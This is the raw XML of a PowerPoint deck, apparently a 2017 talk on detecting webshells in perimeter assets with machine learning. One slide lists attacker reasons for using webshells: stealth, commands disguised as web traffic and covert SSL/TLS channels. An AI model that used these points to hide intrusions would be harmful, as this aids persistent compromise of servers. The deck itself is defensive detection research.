        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628450" y="1472650"/>
            <a:ext cx="7733374" cy="3520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Why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ebshell</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Shape 9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419100" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0"/>
              <a:t>Stealth, compact multi functional tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-419100" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0"/>
              <a:t>Leverage the programming language used in the web applications (PHP, JAVA, ASP, etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-419100" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0"/>
              <a:t>Obfuscate commands appearing “web traffic”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-419100">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0"/>
              <a:t>Covert channel using SSL/TLS</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1824</TotalTime>
  <Words>3022</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>422</Paragraphs>
  <Slides>67</Slides>
  <Notes>36</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Avenir Roman</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Georgia</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Myriad Pro</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>simple-light-2</vt:lpstr>
      <vt:lpstr>Detecting Webshells in Compromised Perimeter Assets Using ML Algorithms</vt:lpstr>
      <vt:lpstr>$Whoami</vt:lpstr>
      <vt:lpstr>Webshell Introduction</vt:lpstr>
      <vt:lpstr>The Perimeter</vt:lpstr>
      <vt:lpstr>What Are Perimeter Assets?</vt:lpstr>
      <vt:lpstr>Perimeter Assets: First Line Of Defense</vt:lpstr>
      <vt:lpstr>Perimeter Assets Can Become Unexpected Back doors</vt:lpstr>
      <vt:lpstr>Do you think they might use same credentials internally? Maybe mail clients? Storage?</vt:lpstr>
      <vt:lpstr>Why Use A Webshell</vt:lpstr>
      <vt:lpstr>What Is A Webshell</vt:lpstr>
      <vt:lpstr>What Is A Webshell</vt:lpstr>
      <vt:lpstr>Webshells </vt:lpstr>
      <vt:lpstr>Webshells Can Be Powerful Weapons</vt:lpstr>
      <vt:lpstr>Some Examples Of Webshells</vt:lpstr>
      <vt:lpstr>Common Functions Of Webshells</vt:lpstr>
      <vt:lpstr>Webshells Can Provide Further Access </vt:lpstr>
      <vt:lpstr>How Are These Webshells Delivered?</vt:lpstr>
      <vt:lpstr>Example Of An Exploit Campaign Using Webshell</vt:lpstr>
      <vt:lpstr>ML For Security</vt:lpstr>
      <vt:lpstr>Layered ML</vt:lpstr>
      <vt:lpstr>ML Security Use Cases</vt:lpstr>
      <vt:lpstr>ML Security Use Cases</vt:lpstr>
      <vt:lpstr>ML Security Use Cases</vt:lpstr>
      <vt:lpstr>ML Security Use Cases</vt:lpstr>
      <vt:lpstr>Example Of ML Solution In The SOC</vt:lpstr>
      <vt:lpstr>Advesarial Models</vt:lpstr>
      <vt:lpstr>Advesarial Models</vt:lpstr>
      <vt:lpstr>Operator Time is Valuable!</vt:lpstr>
      <vt:lpstr>Detecting Webshells With ML</vt:lpstr>
      <vt:lpstr>Detecting Webshells With ML: References</vt:lpstr>
      <vt:lpstr>Lambda Defense: Webshell Decomposition </vt:lpstr>
      <vt:lpstr>Lambda Defense: Webshell Decomposition </vt:lpstr>
      <vt:lpstr>How do we Detect Webshells Using ML</vt:lpstr>
      <vt:lpstr>Global Model Example</vt:lpstr>
      <vt:lpstr>Beyond the Indicator</vt:lpstr>
      <vt:lpstr>How do we Detect Webshells Using ML: Global Stats</vt:lpstr>
      <vt:lpstr>Seeing the Analytic In Action</vt:lpstr>
      <vt:lpstr>Seeing the Analytic In Action</vt:lpstr>
      <vt:lpstr>Seeing the Analytic In Action</vt:lpstr>
      <vt:lpstr>How do we detect Webshells using ML...</vt:lpstr>
      <vt:lpstr>Local Model Example</vt:lpstr>
      <vt:lpstr>How do we Detect Webshells Using ML: Local Stats</vt:lpstr>
      <vt:lpstr>Webshell detection POC/Example</vt:lpstr>
      <vt:lpstr>Webshell detection POC/Example</vt:lpstr>
      <vt:lpstr>Webshell POC/Example</vt:lpstr>
      <vt:lpstr>Webshell detection POC/Example</vt:lpstr>
      <vt:lpstr>Webshell detection POC/Example</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Effective Webshell detection via machine Learning</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Q&amp;A</vt:lpstr>
      <vt:lpstr>Appendix  Operational ML: How to Detect Attack Patterns That Change Over Time </vt:lpstr>
      <vt:lpstr>Step 1: Break the problem in to use cases</vt:lpstr>
      <vt:lpstr>Step 2: Find what use cases have highest security impact</vt:lpstr>
      <vt:lpstr>Step 3: Decompose the problem into two types of computation</vt:lpstr>
      <vt:lpstr>Step 3: Decompose the problem into two types of computation</vt:lpstr>
      <vt:lpstr>Step 3: Decompose the problem into two types of computation</vt:lpstr>
      <vt:lpstr>Step 3: Decompose the problem into two types of computation</vt:lpstr>
      <vt:lpstr>Step 4: Build an ML Model for each important sub-behavior</vt:lpstr>
      <vt:lpstr>Step 4: Build an ML Model for each important sub-behavior</vt:lpstr>
      <vt:lpstr>Step 5:  Operationalize the Model Life Cycle</vt:lpstr>
      <vt:lpstr>Step 5:  Operationalize the Model Life Cycle</vt:lpstr>
      <vt:lpstr>Step 5:  Operationalize the Model Life Cycle</vt:lpstr>
      <vt:lpstr>Step 5:  Operationalize the Model Life Cycle</vt:lpstr>
      <vt:lpstr>Step 5:  Operationalize the Model Life Cycle</vt:lpstr>
      <vt:lpstr>The Lambda Defense: A Complex Design Pattern</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web shells in compromised perimeter assets using ML Algorithms</dc:title>
  <cp:lastModifiedBy>Joseph Zadeh</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-04T15:55:44Z</dcterms:modified>
</cp:coreProperties>
</file>